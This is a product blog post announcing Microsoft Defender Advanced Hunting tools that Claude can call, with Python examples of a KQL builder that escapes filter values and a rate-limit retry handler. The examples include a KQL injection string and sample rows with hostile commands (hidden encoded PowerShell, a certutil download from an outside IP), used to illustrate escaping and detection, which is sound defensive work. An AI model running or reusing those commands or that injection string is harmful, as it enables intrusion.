Defender Advanced Hunting, Now in Chat
May 4, 2026 · InfraScout Team
Microsoft Defender for Endpoint holds a rich, continuously updated picture of what is happening on your devices — every process launch, every network connection, every alert and the entities behind it. Until now, getting at that data meant pivoting into the Defender portal and writing KQL by hand. With this update, you can ask Claude directly: "show me devices with high-severity unresolved alerts in the last 24 hours," or "find machines that ran a suspicious PowerShell command this week" — and get structured results back inside the same assessment conversation.
This release also reorganizes Defender into its own toolset, so AI clients pick the right tool deterministically and audit logs group Defender activity sensibly alongside the rest of your Microsoft cloud reviews.
Advanced Hunting from the conversation
Advanced Hunting is the KQL-over-Defender query surface security teams already know. InfraScout exposes it through three new tools that Claude can call during an assessment:
- Device process events — a typed shape over the most common security pivot. Filter by device, command-line patterns, parent process, and time window to spot living-off-the-land binaries, suspicious script execution, or unusual process lineage.
- Alert evidence — answer "what entities are linked to this alert?" Pull the files, processes, IPs, and accounts behind a Defender alert without leaving the chat.
- Generic KQL — a passthrough for ad-hoc queries when you need joins, summarize, or tables the typed tools do not yet wrap. Bring your own KQL; InfraScout returns the rows.
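How a typed tool like "device process events" can be built so that its filters stay filters, as an added example (this is not InfraScout's code, and it also illustrates the later point that the typed tools accept only the filters they are built for). The table and column names are the real DeviceProcessEvents schema; the filter names, the caps, the hostname regex and the sample values are assumptions made for the example:

```python
"""Added example, not InfraScout's code: a typed Advanced Hunting tool that
turns a fixed set of filters into KQL. Table and column names are the real
DeviceProcessEvents schema; filter names, caps and the regex are assumptions."""
import re
from dataclasses import dataclass
from typing import Optional

MAX_LOOKBACK_HOURS = 24 * 30   # assumed cap on the time window
MAX_ROWS = 1000                # assumed cap on rows per call
_DEVICE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]{0,254}$")  # hostname / FQDN only


def kql_string(value: str) -> str:
    """Render a KQL double-quoted string literal. Backslash and quote are escaped
    so a value can never close the literal and append its own operators."""
    if "\n" in value or "\r" in value:
        raise ValueError("newlines are not allowed in filter values")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


@dataclass(frozen=True)
class ProcessEventFilters:
    """The only knobs the tool exposes; anything else is rejected by the schema."""
    device_name: Optional[str] = None
    command_line_contains: Optional[str] = None
    parent_process: Optional[str] = None
    lookback_hours: int = 24
    limit: int = 100


def build_process_events_query(f: ProcessEventFilters) -> str:
    """Assemble the query from fixed stages. Filter values only ever land inside
    string literals or range-checked integers, never as raw KQL."""
    if not 1 <= f.lookback_hours <= MAX_LOOKBACK_HOURS:
        raise ValueError(f"lookback_hours must be 1..{MAX_LOOKBACK_HOURS}")
    if not 1 <= f.limit <= MAX_ROWS:
        raise ValueError(f"limit must be 1..{MAX_ROWS}")
    stages = ["DeviceProcessEvents", f"where Timestamp > ago({f.lookback_hours}h)"]
    if f.device_name is not None:
        if not _DEVICE_NAME.match(f.device_name):
            raise ValueError("device_name must be a hostname or FQDN")
        stages.append(f"where DeviceName =~ {kql_string(f.device_name)}")
    if f.command_line_contains is not None:
        stages.append(f"where ProcessCommandLine contains {kql_string(f.command_line_contains)}")
    if f.parent_process is not None:
        stages.append(f"where InitiatingProcessFileName =~ {kql_string(f.parent_process)}")
    stages.append("project Timestamp, DeviceName, AccountName, FileName, "
                  "ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine")
    stages.append("order by Timestamp desc")
    stages.append(f"take {f.limit}")
    return "\n| ".join(stages)


def count_stages(query: str) -> int:
    """Number of pipeline stages. Because newlines are rejected in values, a
    hostile filter cannot add a stage; pipes inside a literal are just text."""
    return len(query.split("\n| "))


def rejects(f: ProcessEventFilters) -> bool:
    """True when the tool refuses the filters instead of emitting a query."""
    try:
        build_process_events_query(f)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    hostile = ProcessEventFilters(
        device_name="ws-042.corp.example",
        # A value trying to break out of the literal and bolt on its own stages.
        command_line_contains='-enc" | where 1 == 1 | project-away DeviceName //',
        parent_process="winword.exe",
        lookback_hours=24 * 7,
    )
    print(build_process_events_query(hostile))
```

The point of the shape check is that the command-line value above comes out as one escaped literal inside a single `where` stage; the query still has exactly the stages the tool was written with, and a device name carrying quotes or operators is refused outright rather than escaped.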
Results come back in a consistent envelope with column metadata, row data, total row count, and a truncated flag so Claude knows when there is more to retrieve. Responses are capped at a reasonable size to keep conversations responsive — when a query would return more, Claude can narrow the time range or add filters and try again.
When the Defender API rate-limits a query (HTTP 429), InfraScout surfaces a plain retry hint to the AI client (for example, "Retry after 30 seconds") instead of a cryptic error. Claude waits for that interval and retries on its own, which keeps long investigations flowing without manual intervention.
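What the envelope and the retry hint look like in code, as an added example that is not InfraScout's implementation. The Stats/Schema/Results keys match the shape of the Microsoft Threat Protection advancedhunting/run response; the envelope field names, the row cap, the default retry interval and the sample rows are assumptions constructed for the example:

```python
"""Added example, not InfraScout's code: normalising a raw Advanced Hunting
API response into a columns/rows/total/truncated envelope and turning a
rate-limit response into a plain retry hint. Schema/Results keys follow the
advancedhunting/run response; field names, caps and sample rows are assumed."""
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Optional

ROW_CAP = 2                  # assumed cap, kept tiny so the sample trips it
DEFAULT_RETRY_SECONDS = 30   # assumed fallback when Retry-After is missing

# Constructed sample in the shape the hunting API returns (Stats, Schema, Results).
SAMPLE_RESPONSE = {
    "Stats": {"ExecutionTime": 0.08},
    "Schema": [
        {"Name": "Timestamp", "Type": "DateTime"},
        {"Name": "DeviceName", "Type": "String"},
        {"Name": "ProcessCommandLine", "Type": "String"},
    ],
    "Results": [
        {"Timestamp": "2026-05-04T09:12:41Z", "DeviceName": "ws-042.corp.example",
         "ProcessCommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
        {"Timestamp": "2026-05-04T09:12:45Z", "DeviceName": "ws-042.corp.example",
         "ProcessCommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
        {"Timestamp": "2026-05-04T10:01:03Z", "DeviceName": "srv-db-01.corp.example",
         "ProcessCommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/x.txt x.txt"},
    ],
}


@dataclass(frozen=True)
class HuntingEnvelope:
    columns: list      # [{"name": ..., "type": ...}] in the order the query projected them
    rows: list         # row values in column order, at most row_cap of them
    total_rows: int    # rows the API returned, before the cap was applied
    truncated: bool    # True when rows were dropped; narrow the query and retry


def to_envelope(raw: dict, row_cap: int = ROW_CAP) -> HuntingEnvelope:
    """Flatten the API's list of dicts into positional rows under a fixed column list."""
    columns = [{"name": c["Name"], "type": c["Type"]} for c in raw.get("Schema", [])]
    names = [c["name"] for c in columns]
    results = raw.get("Results", [])
    rows = [[r.get(n) for n in names] for r in results[:row_cap]]
    return HuntingEnvelope(columns, rows, len(results), len(results) > row_cap)


@dataclass(frozen=True)
class RetryHint:
    retry_after_seconds: int
    message: str


def retry_hint(status: int, headers: dict, now: Optional[datetime] = None) -> Optional[RetryHint]:
    """Map an HTTP 429 to a retry hint the AI client can act on. Retry-After may be
    a number of seconds or an HTTP-date; anything unparseable uses the default."""
    if status != 429:
        return None
    raw = next((v for k, v in headers.items() if k.lower() == "retry-after"), None)
    seconds = DEFAULT_RETRY_SECONDS
    if raw is not None:
        try:
            seconds = int(raw)
        except ValueError:
            try:
                when = parsedate_to_datetime(raw)
                seconds = int((when - (now or datetime.now(timezone.utc))).total_seconds())
            except (TypeError, ValueError):
                pass
    seconds = max(1, seconds)   # never tell the client to retry immediately
    return RetryHint(seconds, f"Defender API rate limit hit. Retry after {seconds} seconds.")


if __name__ == "__main__":
    env = to_envelope(SAMPLE_RESPONSE)
    print(env.total_rows, env.truncated, env.rows)
    print(retry_hint(429, {"Retry-After": "30"}))
```

The hunting API itself does not say how many rows a query would have produced beyond what it returned, so `total_rows` counts what came back and `truncated` is decided by InfraScout's own cap; that flag is what tells Claude to narrow the time window or add a filter rather than silently reasoning over a partial result.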
A dedicated Defender toolset
Defender now lives in its own namespace, separate from the broader security tools. The full Microsoft cloud toolset is now grouped by intent:
- Identity — Entra ID users, groups, and sign-in posture
- Platform — Azure subscriptions and resources
- Security — cross-cloud security signals
- Service — Microsoft 365 workloads
- Defender — Defender for Endpoint, including Advanced Hunting
This grouping is visible in the InfraScout dashboard: each MCP tool call is tagged with a category badge, so when you scroll the audit log after an assessment you can see at a glance which calls touched Defender, which queried identity, and which hit Azure. For AI clients, the dedicated namespace also makes tool selection more deterministic: Claude picks the Defender tools for Defender questions instead of guessing at a generic security tool.
The existing Defender machine tools (machine list, recommendations, logon users) move into this same namespace alongside the new hunting tools. If you have playbooks or notes that referenced the older tool names, update them to the new Defender-prefixed names.
Pairs with playbooks
Advanced Hunting is most useful in context. A Defender-readiness assessment can now blend a hunting query into the rest of the playbook flow — for example, walking through onboarding coverage, then pivoting into a process-events query for a specific high-value device, then continuing with the playbook's recommendations. The same conversation captures the query, the result, and the finding, all linked to the run.
The typed tools accept only the filters they are built for, so a filter value lands inside a fixed query shape as a literal rather than becoming part of the KQL, and Claude cannot wander outside that shape. The generic KQL tool runs whatever query it is given, but the Advanced Hunting API behind it is read-only: it can search, summarize, and join, and it cannot change anything in your tenant.
One-time admin step
To enable Advanced Hunting in your tenant, an administrator grants the AdvancedHunting.Read.All application permission on the Microsoft Threat Protection API to the Entra app registration InfraScout uses, and gives admin consent for it. This is separate from the permission used by the existing Defender machine tools, so you can adopt hunting at your own pace. Once the consent is in place, the new tools are available to every assessment in the tenant. Two things to weigh before granting it: an application permission is not tied to a signed-in user, so every assessment runs with the same tenant-wide read access; and the generic KQL tool can read any hunting table that permission covers, including the ones the typed tools do not yet wrap. You can confirm the grant on the app registration's API permissions page, where AdvancedHunting.Read.All should appear under Microsoft Threat Protection with admin consent granted.
The existing Defender machine tools continue to work with their current permission. No change is required to keep using them.
Try it
Open an assessment with Claude and ask a hunting question — "any devices that loaded an unsigned DLL in the last hour?" or "show me alert evidence for alert ID X." Claude picks the right Defender tool, runs the query against your tenant, and returns rows you can act on.
If you want background on the design and the slices still to come (Email and Identity tables, machine actions, Threat Intelligence), the public PRs are a good read: #218 Advanced Hunting tools and #216 Defender toolset split, tracked under issue #215.
Questions or feedback? Reach us at info@infrascout.cloud.